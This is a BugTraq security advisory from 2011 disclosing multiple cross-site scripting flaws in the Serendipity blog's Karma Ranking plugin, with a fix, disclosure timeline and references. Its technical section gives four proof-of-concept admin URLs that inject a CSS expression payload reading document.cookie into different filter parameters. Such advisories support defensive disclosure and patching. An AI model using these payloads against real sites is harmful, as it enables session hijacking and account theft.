BugTraq
Serendipity Plugin 'Karma Ranking' Multiple Cross-Site Scripting Nov 02 2011 08:42PM
sschurtz t-online de
Advisory: Serendipity Plugin 'Karma Ranking' Multiple Cross-Site Scripting vulnerabilities
Advisory ID: SSCHADV2011-017
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.5.5 with Karma Ranking Plugin version 1.1
Vendor URL: http://www.s9y.org
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

Multiple parameters in the Karma Ranking plugin (Serendipity backend) are prone to a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

Successfully tested with Internet Explorer 8

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=e
vent_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=
karmalog&serendipity[adminModule]=event_display&serendipity[filter][entr
yid]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][ip]=3&serendipity[filter][title]=3&serendipity[filt
er][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][or
dermode]=DESC&submit=-+Go!+-

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=e
vent_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=
karmalog&serendipity[adminModule]=event_display&serendipity[filter][entr
yid]=3&serendipity[filter][ip]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][title]=3&serendipity[filter][user_agent]=3&serendip
ity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!
+-

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=e
vent_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=
karmalog&serendipity[adminModule]=event_display&serendipity[filter][entr
yid]=3&serendipity[filter][ip]=3&serendipity[filter][title]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&ser
endipity[sort][ordermode]=DESC&submit=-+Go!+-

http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=e
vent_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=
karmalog&serendipity[adminModule]=event_display&serendipity[filter][entr
yid]=3&serendipity[filter][ip]=3&serendipity[filter][title]=3&serendipit
y[filter][user_agent]=' stYle='x:expre/**/ssion(alert(document.cookie)) &serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&sub
mit=-+Go!+-

=========
Solution:
=========

Upgrade to Serendipity 1.6

====================
Disclosure Timeline:
====================

22-Sep-2011 - informed developers
27-Oct-2011 - fixed by vendor
02-Nov-2011 - release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.s9y.org
http://blog.s9y.org/archives/233-Serendipity-1.6-released.html
http://www.rul3z.de/advisories/SSCHADV2011-017.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus